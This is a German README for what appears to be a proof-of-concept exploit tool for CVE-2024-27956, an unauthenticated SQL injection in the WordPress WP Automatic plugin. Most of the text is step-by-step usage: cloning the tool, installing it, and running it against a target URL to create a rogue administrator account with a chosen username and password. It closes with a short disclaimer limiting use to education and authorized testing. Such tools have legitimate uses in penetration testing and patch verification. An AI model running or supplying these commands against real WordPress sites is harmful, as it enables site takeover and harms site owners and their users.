
CVE-2024-27956 - WP Automatic SQL Injection Exploit-Tool
Ein Proof-of-Concept-Exploit für die SQL-Injection-Sicherheitslücke im WP Automatic Plugin (CVE-2024-27956), die WordPress-Seiten betrifft.
Dieser Exploit zielt auf eine kritische, nicht authentifizierte SQL-Injection-Sicherheitslücke im WP Automatic Plugin (Versionen < 3.9.2.0) für WordPress ab. Die Schwachstelle ermöglicht es Angreifern, administrative Benutzer zu erstellen und die vollständige Kontrolle über anfällige Websites zu erlangen.
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
python3 exploit.py http://vulnerable-site.com
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
positional arguments:
url Target WordPress URL
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username for the new admin account
-p PASSWORD, --password PASSWORD
Password for the new admin account
Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt. Der Entwickler übernimmt keine Verantwortung für jegliche missbräuchliche Verwendung dieser Software. Holen Sie stets eine entsprechende Genehmigung ein, bevor Sie Systeme testen.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.